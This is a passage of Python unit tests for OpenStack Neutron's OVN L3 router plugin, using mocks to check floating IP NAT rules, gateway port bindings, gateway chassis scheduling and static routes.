gf.return_value = {'floating_port_id': 'fip-port-id'}
config.cfg.CONF.set_override(
'enable_distributed_floating_ip', True, group='ovn')
self.l3_inst.create_floatingip(self.context, 'floatingip')
expected_ext_ids = {
ovn_const.OVN_FIP_EXT_ID_KEY: self.fake_floating_ip['id'],
ovn_const.OVN_REV_NUM_EXT_ID_KEY: '1',
ovn_const.OVN_FIP_PORT_EXT_ID_KEY:
self.fake_floating_ip['port_id'],
ovn_const.OVN_ROUTER_NAME_EXT_ID_KEY: utils.ovn_name(
self.fake_floating_ip['router_id']),
ovn_const.OVN_FIP_EXT_MAC_KEY: '00:01:02:03:04:05'}
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_called_once_with(
'neutron-router-id', type='dnat_and_snat', logical_ip='10.0.0.10',
external_ip='192.168.0.10', external_mac='00:01:02:03:04:05',
logical_port='port_id',
external_ids=expected_ext_ids)
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_port')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin._get_floatingip')
def test_create_floatingip_distributed_logical_port_down(self, gf, gp):
self.get_a_ctx_mock_p.stop()
# Check that when the port is down, the external_mac field is not
# populated. This falls back to centralized routing for ports that
# are not bound to a chassis.
self.l3_inst._ovn.is_col_present.return_value = True
self.l3_inst._ovn.lsp_get_up.return_value.execute.return_value = (
False)
gp.return_value = {'mac_address': '00:01:02:03:04:05'}
gf.return_value = {'floating_port_id': 'fip-port-id'}
config.cfg.CONF.set_override(
'enable_distributed_floating_ip', True, group='ovn')
self.l3_inst.create_floatingip(self.context, 'floatingip')
expected_ext_ids = {
ovn_const.OVN_FIP_EXT_ID_KEY: self.fake_floating_ip['id'],
ovn_const.OVN_REV_NUM_EXT_ID_KEY: '1',
ovn_const.OVN_FIP_PORT_EXT_ID_KEY:
self.fake_floating_ip['port_id'],
ovn_const.OVN_ROUTER_NAME_EXT_ID_KEY: utils.ovn_name(
self.fake_floating_ip['router_id']),
ovn_const.OVN_FIP_EXT_MAC_KEY: '00:01:02:03:04:05'}
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_called_once_with(
'neutron-router-id', type='dnat_and_snat', logical_ip='10.0.0.10',
external_ip='192.168.0.10',
logical_port='port_id',
external_ids=expected_ext_ids)
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin._get_floatingip')
def test_create_floatingip_external_ip_present_in_nat_rule(self, gf):
self.get_a_ctx_mock_p.stop()
self.l3_inst._ovn.is_col_present.return_value = True
gf.return_value = {'floating_port_id': 'fip-port-id'}
self.l3_inst._ovn.get_lrouter_nat_rules.return_value = [
{'external_ip': '192.168.0.10', 'logical_ip': '10.0.0.6',
'type': 'dnat_and_snat', 'uuid': 'uuid1'}]
self.l3_inst.create_floatingip(self.context, 'floatingip')
expected_ext_ids = {
ovn_const.OVN_FIP_EXT_ID_KEY: self.fake_floating_ip['id'],
ovn_const.OVN_REV_NUM_EXT_ID_KEY: '1',
ovn_const.OVN_FIP_PORT_EXT_ID_KEY:
self.fake_floating_ip['port_id'],
ovn_const.OVN_ROUTER_NAME_EXT_ID_KEY: utils.ovn_name(
self.fake_floating_ip['router_id'])}
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_called_once_with(
'neutron-router-id',
type='dnat_and_snat',
logical_ip='10.0.0.10',
external_ip='192.168.0.10',
external_ids=expected_ext_ids)
self.l3_inst._ovn.delete_lswitch_port.assert_called_once_with(
'fip-port-id', 'neutron-fip-net-id')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin._get_floatingip')
def test_create_floatingip_external_ip_present_type_snat(self, gf):
self.get_a_ctx_mock_p.stop()
self.l3_inst._ovn.is_col_present.return_value = True
gf.return_value = {'floating_port_id': 'fip-port-id'}
self.l3_inst._ovn.get_lrouter_nat_rules.return_value = [
{'external_ip': '192.168.0.10', 'logical_ip': '10.0.0.0/24',
'type': 'snat', 'uuid': 'uuid1'}]
self.l3_inst.create_floatingip(self.context, 'floatingip')
self.l3_inst._ovn.set_nat_rule_in_lrouter.assert_not_called()
expected_ext_ids = {
ovn_const.OVN_FIP_EXT_ID_KEY: self.fake_floating_ip['id'],
ovn_const.OVN_REV_NUM_EXT_ID_KEY: '1',
ovn_const.OVN_FIP_PORT_EXT_ID_KEY:
self.fake_floating_ip['port_id'],
ovn_const.OVN_ROUTER_NAME_EXT_ID_KEY: utils.ovn_name(
self.fake_floating_ip['router_id'])}
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_called_once_with(
'neutron-router-id',
type='dnat_and_snat',
logical_ip='10.0.0.10',
external_ip='192.168.0.10',
external_ids=expected_ext_ids)
self.l3_inst._ovn.delete_lswitch_port.assert_called_once_with(
'fip-port-id', 'neutron-fip-net-id')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin._get_floatingip')
def test_create_floatingip_lsp_external_id(self, gf):
self.get_a_ctx_mock_p.stop()
foo_lport = fake_resources.FakeOvsdbRow.create_one_ovsdb_row()
foo_lport.uuid = 'foo-port'
self.l3_inst._ovn.get_lswitch_port.return_value = foo_lport
self.l3_inst.create_floatingip(self.context, 'floatingip')
calls = [mock.call(
'Logical_Switch_Port',
'foo-port',
('external_ids', {ovn_const.OVN_PORT_FIP_EXT_ID_KEY:
'192.168.0.10'}))]
self.l3_inst._ovn.db_set.assert_has_calls(calls)
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin._get_floatingip')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_port')
def test_create_floatingip_lb_member_fip(self, gp, gf):
self.get_a_ctx_mock_p.stop()
config.cfg.CONF.set_override(
'enable_distributed_floating_ip', True, group='ovn')
        # Stop the _is_lb_member_fip mock so the real helper is used
        # for this test.
self.mock_is_lb_member_fip.stop()
gp.return_value = self.member_port
gf.return_value = self.fake_floating_ip
self.l3_inst._ovn.lookup.return_value = self.lb_network
self.l3_inst._ovn.get_lswitch_port.return_value = self.member_lsp
self.l3_inst.create_floatingip(self.context, 'floatingip')
        # Validate that neither external_mac nor logical_port is set
        # in the NAT entry.
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_called_once_with(
'neutron-router-id',
external_ip='192.168.0.10',
logical_ip='10.0.0.10',
type='dnat_and_snat')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_subnet')
def test_create_floatingip_lb_vip_fip(self, gs):
self.get_a_ctx_mock_p.stop()
config.cfg.CONF.set_override(
'enable_distributed_floating_ip', True, group='ovn')
gs.return_value = self.member_subnet
self.l3_inst._ovn.get_lswitch_port.return_value = self.lb_vip_lsp
self.l3_inst._ovn.db_find_rows.return_value.execute.side_effect = [
[self.ovn_lb],
[self.lb_network],
[self.fake_ovn_nat_rule],
]
self.l3_inst._ovn.lookup.return_value = self.lb_network
self.l3_inst.create_floatingip(self.context, 'floatingip')
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_called_once_with(
'neutron-router-id',
external_ip='192.168.0.10',
external_mac='aa:aa:aa:aa:aa:aa',
logical_ip='10.0.0.10',
logical_port='port_id',
type='dnat_and_snat')
self.l3_inst._ovn.db_find_rows.assert_called_with(
'NAT', ('external_ids', '=', {ovn_const.OVN_FIP_PORT_EXT_ID_KEY:
self.member_lsp.name}))
# Validate that it clears external_mac/logical_port for member NAT.
self.l3_inst._ovn.db_clear.assert_has_calls([
mock.call('NAT', self.fake_ovn_nat_rule.uuid, 'external_mac'),
mock.call('NAT', self.fake_ovn_nat_rule.uuid, 'logical_port')])
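    # Deleting a floating IP removes the corresponding dnat_and_snat
    # rule from the logical router.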
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.delete_floatingip')
def test_delete_floatingip(self, df):
self.l3_inst._ovn.get_floatingip.return_value = (
self.fake_ovn_nat_rule)
self.l3_inst.delete_floatingip(self.context, 'floatingip-id')
self.l3_inst._ovn.delete_nat_rule_in_lrouter.assert_called_once_with(
'neutron-router-id',
type='dnat_and_snat',
logical_ip='10.0.0.10',
external_ip='192.168.0.10')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_subnet')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin._get_floatingip')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.delete_floatingip')
def test_delete_floatingip_lb_vip_fip(self, df, gf, gs):
config.cfg.CONF.set_override(
'enable_distributed_floating_ip', True, group='ovn')
gs.return_value = self.member_subnet
gf.return_value = self.fake_floating_ip
self.l3_inst._ovn.get_floatingip.return_value = (
self.fake_ovn_nat_rule)
self.l3_inst._ovn.get_lswitch_port.return_value = self.lb_vip_lsp
self.l3_inst._ovn.db_find_rows.return_value.execute.side_effect = [
[self.ovn_lb],
[self.lb_network],
[self.fake_ovn_nat_rule],
]
self.l3_inst._ovn.lookup.return_value = self.lb_network
self.l3_inst.delete_floatingip(self.context, 'floatingip-id')
self.l3_inst._ovn.delete_nat_rule_in_lrouter.assert_called_once_with(
'neutron-router-id',
type='dnat_and_snat',
logical_ip='10.0.0.10',
external_ip='192.168.0.10')
self.l3_inst._ovn.db_find_rows.assert_called_with(
'NAT', ('external_ids', '=',
{ovn_const.OVN_FIP_PORT_EXT_ID_KEY: self.member_lsp.name}))
self.l3_inst._plugin.get_port.assert_called_once_with(
mock.ANY, self.member_lsp.name)
# Validate that it adds external_mac/logical_port back.
self.l3_inst._ovn.db_set.assert_has_calls([
mock.call('NAT', self.fake_ovn_nat_rule.uuid,
('logical_port', self.member_lsp.name)),
mock.call('NAT', self.fake_ovn_nat_rule.uuid,
('external_mac', 'aa:aa:aa:aa:aa:aa'))])
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin._get_floatingip')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.delete_floatingip')
def test_delete_floatingip_lsp_external_id(self, df, gf):
gf.return_value = self.fake_floating_ip
self.l3_inst._ovn.get_floatingip.return_value = (
self.fake_ovn_nat_rule)
foo_lport = fake_resources.FakeOvsdbRow.create_one_ovsdb_row()
foo_lport.uuid = 'foo-port'
foo_lport.external_ids = {
ovn_const.OVN_PORT_FIP_EXT_ID_KEY: 'foo-port'}
self.l3_inst._ovn.get_lswitch_port.return_value = foo_lport
self.l3_inst.delete_floatingip(self.context, 'floatingip-id')
calls = [mock.call(
'Logical_Switch_Port', 'foo-port',
'external_ids', ovn_const.OVN_PORT_FIP_EXT_ID_KEY)]
self.l3_inst._ovn.db_remove.assert_has_calls(calls)
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin._get_floatingip')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.delete_floatingip')
def test_delete_floatingip_no_lsp_external_id(self, df, gf):
gf.return_value = self.fake_floating_ip
self.l3_inst._ovn.get_floatingip.return_value = (
self.fake_ovn_nat_rule)
self.l3_inst._ovn.get_lswitch_port.return_value = None
self.l3_inst.delete_floatingip(self.context, 'floatingip-id')
self.l3_inst._ovn.db_remove.assert_not_called()
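    # Updating a floating IP deletes the old NAT rule and re-adds it on
    # the (possibly new) router.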
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin._get_floatingip')
@mock.patch('neutron.db.extraroute_db.ExtraRoute_dbonly_mixin.'
'update_floatingip')
def test_update_floatingip(self, uf, gf):
self.get_a_ctx_mock_p.stop()
self.l3_inst._ovn.is_col_present.return_value = True
gf.return_value = self.fake_floating_ip
uf.return_value = self.fake_floating_ip_new
self.l3_inst._ovn.get_floatingip.return_value = (
self.fake_ovn_nat_rule)
self.l3_inst.update_floatingip(self.context, 'id', 'floatingip')
self.l3_inst._ovn.delete_nat_rule_in_lrouter.assert_called_once_with(
'neutron-router-id',
type='dnat_and_snat',
logical_ip='10.0.0.10',
external_ip='192.168.0.10')
expected_ext_ids = {
ovn_const.OVN_FIP_EXT_ID_KEY: self.fake_floating_ip_new['id'],
ovn_const.OVN_REV_NUM_EXT_ID_KEY: '1',
ovn_const.OVN_FIP_PORT_EXT_ID_KEY:
self.fake_floating_ip_new['port_id'],
ovn_const.OVN_ROUTER_NAME_EXT_ID_KEY: utils.ovn_name(
self.fake_floating_ip_new['router_id'])}
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_called_once_with(
'neutron-new-router-id',
type='dnat_and_snat',
logical_ip='10.10.10.10',
external_ip='192.168.0.10',
external_ids=expected_ext_ids)
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin._get_floatingip')
@mock.patch('neutron.db.extraroute_db.ExtraRoute_dbonly_mixin.'
'update_floatingip')
def test_update_floatingip_associate(self, uf, gf):
self.get_a_ctx_mock_p.stop()
self.l3_inst._ovn.is_col_present.return_value = True
self.fake_floating_ip.update({'fixed_port_id': None})
gf.return_value = self.fake_floating_ip
uf.return_value = self.fake_floating_ip_new
self.l3_inst.update_floatingip(self.context, 'id', 'floatingip')
self.l3_inst._ovn.delete_nat_rule_in_lrouter.assert_not_called()
expected_ext_ids = {
ovn_const.OVN_FIP_EXT_ID_KEY: self.fake_floating_ip_new['id'],
ovn_const.OVN_REV_NUM_EXT_ID_KEY: '1',
ovn_const.OVN_FIP_PORT_EXT_ID_KEY:
self.fake_floating_ip_new['port_id'],
ovn_const.OVN_ROUTER_NAME_EXT_ID_KEY: utils.ovn_name(
self.fake_floating_ip_new['router_id'])}
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_called_once_with(
'neutron-new-router-id',
type='dnat_and_snat',
logical_ip='10.10.10.10',
external_ip='192.168.0.10',
external_ids=expected_ext_ids)
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_network')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_port')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin._get_floatingip')
@mock.patch('neutron.db.extraroute_db.ExtraRoute_dbonly_mixin.'
'update_floatingip')
def test_update_floatingip_associate_distributed(self, uf, gf, gp, gn):
self.get_a_ctx_mock_p.stop()
self.l3_inst._ovn.is_col_present.return_value = True
self.fake_floating_ip.update({'fixed_port_id': None})
gp.return_value = {'mac_address': '00:01:02:03:04:05',
'network_id': 'port-network-id'}
gf.return_value = self.fake_floating_ip
uf.return_value = self.fake_floating_ip_new
        fake_network_flat = copy.deepcopy(self.fake_network)
        fake_network_flat[pnet.NETWORK_TYPE] = constants.TYPE_FLAT
        gn.return_value = fake_network_flat
config.cfg.CONF.set_override(
'enable_distributed_floating_ip', True, group='ovn')
self.l3_inst.update_floatingip(self.context, 'id', 'floatingip')
self.l3_inst._ovn.delete_nat_rule_in_lrouter.assert_not_called()
expected_ext_ids = {
ovn_const.OVN_FIP_EXT_ID_KEY: self.fake_floating_ip_new['id'],
ovn_const.OVN_REV_NUM_EXT_ID_KEY: '1',
ovn_const.OVN_FIP_PORT_EXT_ID_KEY:
self.fake_floating_ip_new['port_id'],
ovn_const.OVN_ROUTER_NAME_EXT_ID_KEY: utils.ovn_name(
self.fake_floating_ip_new['router_id']),
ovn_const.OVN_FIP_EXT_MAC_KEY: '00:01:02:03:04:05'}
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_called_once_with(
'neutron-new-router-id', type='dnat_and_snat',
logical_ip='10.10.10.10', external_ip='192.168.0.10',
external_mac='00:01:02:03:04:05', logical_port='new-port_id',
external_ids=expected_ext_ids)
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin._get_floatingip')
@mock.patch('neutron.db.extraroute_db.ExtraRoute_dbonly_mixin.'
'update_floatingip')
def test_update_floatingip_association_empty_update(self, uf, gf):
self.get_a_ctx_mock_p.stop()
self.l3_inst._ovn.is_col_present.return_value = True
self.l3_inst._ovn.get_floatingip.return_value = (
self.fake_ovn_nat_rule)
self.fake_floating_ip.update({'fixed_port_id': 'foo'})
self.fake_floating_ip_new.update({'port_id': 'foo'})
gf.return_value = self.fake_floating_ip
uf.return_value = self.fake_floating_ip_new
self.l3_inst.update_floatingip(self.context, 'id', 'floatingip')
self.l3_inst._ovn.delete_nat_rule_in_lrouter.assert_called_once_with(
'neutron-router-id',
type='dnat_and_snat',
logical_ip='10.0.0.10',
external_ip='192.168.0.10')
expected_ext_ids = {
ovn_const.OVN_FIP_EXT_ID_KEY: self.fake_floating_ip_new['id'],
ovn_const.OVN_REV_NUM_EXT_ID_KEY: '1',
ovn_const.OVN_FIP_PORT_EXT_ID_KEY:
self.fake_floating_ip_new['port_id'],
ovn_const.OVN_ROUTER_NAME_EXT_ID_KEY: utils.ovn_name(
self.fake_floating_ip_new['router_id'])}
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_called_once_with(
'neutron-new-router-id',
type='dnat_and_snat',
logical_ip='10.10.10.10',
external_ip='192.168.0.10',
external_ids=expected_ext_ids)
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin._get_floatingip')
@mock.patch('neutron.db.extraroute_db.ExtraRoute_dbonly_mixin.'
'update_floatingip')
def test_update_floatingip_reassociate_to_same_port_diff_fixed_ip(
self, uf, gf):
self.get_a_ctx_mock_p.stop()
self.l3_inst._ovn.is_col_present.return_value = True
self.l3_inst._ovn.get_floatingip.return_value = (
self.fake_ovn_nat_rule)
self.fake_floating_ip_new.update({'port_id': 'port_id',
'fixed_port_id': 'port_id'})
gf.return_value = self.fake_floating_ip
uf.return_value = self.fake_floating_ip_new
self.l3_inst.update_floatingip(self.context, 'id', 'floatingip')
self.l3_inst._ovn.delete_nat_rule_in_lrouter.assert_called_once_with(
'neutron-router-id',
type='dnat_and_snat',
logical_ip='10.0.0.10',
external_ip='192.168.0.10')
expected_ext_ids = {
ovn_const.OVN_FIP_EXT_ID_KEY: self.fake_floating_ip_new['id'],
ovn_const.OVN_REV_NUM_EXT_ID_KEY: '1',
ovn_const.OVN_FIP_PORT_EXT_ID_KEY:
self.fake_floating_ip_new['port_id'],
ovn_const.OVN_ROUTER_NAME_EXT_ID_KEY: utils.ovn_name(
self.fake_floating_ip_new['router_id'])}
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_called_once_with(
'neutron-new-router-id',
type='dnat_and_snat',
logical_ip='10.10.10.10',
external_ip='192.168.0.10',
external_ids=expected_ext_ids)
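    # Disassociating a port should remove the NAT rules of every
    # floating IP attached to it.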
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.get_floatingips')
def test_disassociate_floatingips(self, gfs):
gfs.return_value = [{'id': 'fip-id1',
'floating_ip_address': '192.168.0.10',
'router_id': 'router-id',
'port_id': 'port_id',
'floating_port_id': 'fip-port-id1',
'fixed_ip_address': '10.0.0.10'},
{'id': 'fip-id2',
'floating_ip_address': '192.167.0.10',
'router_id': 'router-id',
'port_id': 'port_id',
'floating_port_id': 'fip-port-id2',
'fixed_ip_address': '10.0.0.11'}]
self.l3_inst.disassociate_floatingips(self.context, 'port_id',
do_notify=False)
delete_nat_calls = [mock.call('neutron-router-id',
type='dnat_and_snat',
logical_ip=fip['fixed_ip_address'],
external_ip=fip['floating_ip_address'])
for fip in gfs.return_value]
self.assertEqual(
len(delete_nat_calls),
self.l3_inst._ovn.delete_nat_rule_in_lrouter.call_count)
self.l3_inst._ovn.delete_nat_rule_in_lrouter.assert_has_calls(
delete_nat_calls, any_order=True)
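    # The AFTER_UPDATE port event should only trigger an OVN router
    # port update for router interface ports.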
@mock.patch('neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.'
'ovn_client.OVNClient.update_router_port')
def test_port_update_postcommit(self, update_rp_mock):
kwargs = {'port': {'device_owner': 'foo'}}
self.l3_inst._port_update(resources.PORT, events.AFTER_UPDATE, None,
**kwargs)
update_rp_mock.assert_not_called()
kwargs = {'port': {'device_owner': constants.DEVICE_OWNER_ROUTER_INTF}}
self.l3_inst._port_update(resources.PORT, events.AFTER_UPDATE, None,
**kwargs)
update_rp_mock.assert_called_once_with(kwargs['port'], if_exists=True)
@mock.patch('neutron.plugins.ml2.plugin.Ml2Plugin.update_port_status')
@mock.patch('neutron.plugins.ml2.plugin.Ml2Plugin.update_port')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_ports')
def test_update_router_gateway_port_bindings_active(
self, mock_get_port, mock_updt_port, mock_updt_status):
fake_host = 'fake-host'
fake_router = 'fake-router'
fake_port_id = 'fake-port-id'
mock_get_port.return_value = [{
'id': fake_port_id,
'status': constants.PORT_STATUS_DOWN}]
self.l3_inst.update_router_gateway_port_bindings(
fake_router, fake_host)
# Assert that the port is being bound
expected_update = {'port': {portbindings.HOST_ID: fake_host}}
mock_updt_port.assert_called_once_with(
mock.ANY, fake_port_id, expected_update)
# Assert that the port status is being set to ACTIVE
mock_updt_status.assert_called_once_with(
mock.ANY, fake_port_id, constants.PORT_STATUS_ACTIVE)
@mock.patch('neutron.plugins.ml2.plugin.Ml2Plugin.update_port_status')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_ports')
def test_update_router_gateway_port_bindings_down(
self, mock_get_port, mock_updt_status):
fake_port_id = 'fake-port-id'
mock_get_port.return_value = [{
'id': fake_port_id,
'status': constants.PORT_STATUS_ACTIVE}]
self.l3_inst.update_router_gateway_port_bindings(None, None)
# Assert that the port status is being set to DOWN
mock_updt_status.assert_called_once_with(
mock.ANY, fake_port_id, constants.PORT_STATUS_DOWN)
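    # Gateway scheduling: unhosted gateway ports are (re)scheduled
    # across the available gateway chassis.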
def test_schedule_unhosted_gateways_no_gateways(self):
self.get_a_ctx_mock_p.stop()
self.nb_idl().get_unhosted_gateways.return_value = []
self.l3_inst.schedule_unhosted_gateways()
self.nb_idl().update_lrouter_port.assert_not_called()
def test_schedule_unhosted_gateways(self):
self.get_a_ctx_mock_p.stop()
unhosted_gws = ['lrp-foo-1', 'lrp-foo-2', 'lrp-foo-3']
chassis_mappings = {
'chassis1': ['physnet1'],
'chassis2': ['physnet1'],
'chassis3': ['physnet1']}
chassis = ['chassis1', 'chassis2', 'chassis3']
self.sb_idl().get_chassis_and_physnets.return_value = (
chassis_mappings)
self.sb_idl().get_gateway_chassis_from_cms_options.return_value = (
chassis)
self.nb_idl().get_unhosted_gateways.return_value = unhosted_gws
# 1. port has 2 gateway chassis
# 2. port has only chassis2
# 3. port is not bound
existing_port_bindings = [
['chassis1', 'chassis2'],
['chassis2'],
[]]
self.nb_idl().get_gateway_chassis_binding.side_effect = (
existing_port_bindings)
        # For port 1. the existing schedule is kept and only the third
        #   chassis is appended
        # For port 2. the master chassis is kept even though the
        #   scheduler proposed a different order
        # For port 3. all chassis are scheduled from scratch
self.mock_schedule.side_effect = [
['chassis1', 'chassis2', 'chassis3'],
['chassis1', 'chassis2', 'chassis3'],
['chassis3', 'chassis2', 'chassis1']]
self.l3_inst.schedule_unhosted_gateways()
self.mock_candidates.assert_has_calls([
mock.call(mock.ANY,
chassis_physnets=chassis_mappings,
cms=chassis)] * 3)
self.mock_schedule.assert_has_calls([
mock.call(self.nb_idl(), self.sb_idl(),
'lrp-foo-1', [], ['chassis1', 'chassis2']),
mock.call(self.nb_idl(), self.sb_idl(),
'lrp-foo-2', [], ['chassis2']),
mock.call(self.nb_idl(), self.sb_idl(),
'lrp-foo-3', [], [])])
        # Make sure that the master chassis of the second port stays
        # untouched
self.nb_idl().update_lrouter_port.assert_has_calls([
mock.call('lrp-foo-1',
gateway_chassis=['chassis1', 'chassis2', 'chassis3']),
mock.call('lrp-foo-2',
gateway_chassis=['chassis2', 'chassis1', 'chassis3']),
mock.call('lrp-foo-3',
gateway_chassis=['chassis3', 'chassis2', 'chassis1'])])
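    # With ovn_emit_need_to_frag enabled, the gateway port gets the
    # gateway_mtu option set from the network MTU.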
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_network')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_port')
@mock.patch('neutron.db.db_base_plugin_v2.NeutronDbPluginV2.get_subnet')
@mock.patch('neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.'
'ovn_client.OVNClient._get_router_ports')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.get_router')
@mock.patch('neutron.db.l3_db.L3_NAT_dbonly_mixin.add_router_interface')
def test_add_router_interface_need_to_frag_enabled(self, ari, gr, grps,
gs, gp, gn):
config.cfg.CONF.set_override(
'ovn_emit_need_to_frag', True, group='ovn')
router_id = 'router-id'
interface_info = {'port_id': 'router-port-id'}
ari.return_value = self.fake_router_interface_info
gr.return_value = self.fake_router_with_ext_gw
gs.return_value = self.fake_subnet
gn.return_value = self.fake_network
self.fake_router_port['device_owner'] = (
constants.DEVICE_OWNER_ROUTER_GW)
gp.return_value = self.fake_router_port
self.l3_inst.add_router_interface(self.context, router_id,
interface_info)
# Make sure that the "gateway_mtu" option was set to the router port
fake_router_port_assert = self.fake_router_port_assert
fake_router_port_assert['gateway_chassis'] = mock.ANY
fake_router_port_assert['options'] = {
ovn_const.OVN_ROUTER_PORT_GW_MTU_OPTION:
str(self.fake_network['mtu'])}
self.l3_inst._ovn.add_lrouter_port.assert_called_once_with(
**fake_router_port_assert)
self.l3_inst._ovn.set_lrouter_port_in_lswitch_port.\
assert_called_once_with(
'router-port-id', 'lrp-router-port-id', is_gw_port=True,
lsp_address=ovn_const.DEFAULT_ADDR_FOR_LSP_WITH_PEER)
self.l3_inst._ovn.add_nat_rule_in_lrouter.assert_called_once_with(
'neutron-router-id', logical_ip='10.0.0.0/24',
external_ip='192.168.1.1', type='snat')
self.bump_rev_p.assert_called_with(
self.admin_context, self.fake_router_port,
ovn_const.TYPE_ROUTER_PORTS)
class OVNL3ExtrarouteTests(test_l3_gw.ExtGwModeIntTestCase,
test_l3.L3NatDBIntTestCase,
test_extraroute.ExtraRouteDBTestCaseBase):
    # TODO(lucasagomes): Ideally, this method should be moved to a base
    # class which all test classes in networking-ovn inherit from, but
    # such a base class doesn't exist yet, so we need to duplicate it
    # here
def _start_mock(self, path, return_value, new_callable=None):
patcher = mock.patch(path, return_value=return_value,
new_callable=new_callable)
patch = patcher.start()
self.addCleanup(patcher.stop)
return patch
def setUp(self):
plugin = 'neutron.tests.unit.extensions.test_l3.TestNoL3NatPlugin'
l3_plugin = ('neutron.services.ovn_l3.plugin.OVNL3RouterPlugin')
service_plugins = {'l3_plugin_name': l3_plugin}
# For these tests we need to enable overlapping ips
cfg.CONF.set_default('allow_overlapping_ips', True)
cfg.CONF.set_default('max_routes', 3)
ext_mgr = test_extraroute.ExtraRouteTestExtensionManager()
super(test_l3.L3BaseForIntTests, self).setUp(
plugin=plugin, ext_mgr=ext_mgr,
service_plugins=service_plugins)
revision_plugin.RevisionPlugin()
l3_gw_mgr = test_l3_gw.TestExtensionManager()
test_extensions.setup_extensions_middleware(l3_gw_mgr)
self.l3_inst = directory.get_plugin(plugin_constants.L3)
self._start_mock(
'neutron.services.ovn_l3.plugin.OVNL3RouterPlugin._ovn',
new_callable=mock.PropertyMock,
return_value=fake_resources.FakeOvsdbNbOvnIdl())
self._start_mock(
'neutron.services.ovn_l3.plugin.OVNL3RouterPlugin._sb_ovn',
new_callable=mock.PropertyMock,
return_value=fake_resources.FakeOvsdbSbOvnIdl())
self._start_mock(
'neutron.scheduler.l3_ovn_scheduler.'
'OVNGatewayScheduler._schedule_gateway',
return_value='hv1')
self._start_mock(
'neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.ovn_client.'
'OVNClient.get_candidates_for_scheduling',
return_value=[])
self._start_mock(
'neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.ovn_client.'
'OVNClient._get_v4_network_of_all_router_ports',
return_value=[])
self._start_mock(
'neutron.plugins.ml2.drivers.ovn.mech_driver.ovsdb.ovn_client.'
'OVNClient.update_floatingip_status',
return_value=None)
self._start_mock(
'neutron.common.ovn.utils.get_revision_number',
return_value=1)
self.setup_notification_driver()
    # Note(dongj): According to bug #1657693, the status of an unassociated
    # floating IP is set to DOWN. Revise expected_status to DOWN for the
    # related test cases.
def test_floatingip_update(
self, expected_status=constants.FLOATINGIP_STATUS_DOWN):
super(OVNL3ExtrarouteTests, self).test_floatingip_update(
expected_status)
def test_floatingip_update_to_same_port_id_twice(
self, expected_status=constants.FLOATINGIP_STATUS_DOWN):
super(OVNL3ExtrarouteTests, self).\
test_floatingip_update_to_same_port_id_twice(expected_status)
def test_floatingip_update_subnet_gateway_disabled(
self, expected_status=constants.FLOATINGIP_STATUS_DOWN):
super(OVNL3ExtrarouteTests, self).\
test_floatingip_update_subnet_gateway_disabled(expected_status)
# Test function _subnet_update of L3 OVN plugin.
def test_update_subnet_gateway_for_external_net(self):
super(OVNL3ExtrarouteTests, self). \
test_update_subnet_gateway_for_external_net()
self.l3_inst._ovn.add_static_route.assert_called_once_with(
'neutron-fake_device', ip_prefix='0.0.0.0/0', nexthop='120.0.0.2')
self.l3_inst._ovn.delete_static_route.assert_called_once_with(
'neutron-fake_device', ip_prefix='0.0.0.0/0', nexthop='120.0.0.1')
def test_router_update_gateway_upon_subnet_create_max_ips_ipv6(self):
super(OVNL3ExtrarouteTests, self). \
test_router_update_gateway_upon_subnet_create_max_ips_ipv6()
add_static_route_calls = [
mock.call(mock.ANY, ip_prefix='0.0.0.0/0', nexthop='10.0.0.1'),
mock.call(mock.ANY, ip_prefix='::/0', nexthop='2001:db8::')]
self.l3_inst._ovn.add_static_route.assert_has_calls(
add_static_route_calls, any_order=True)
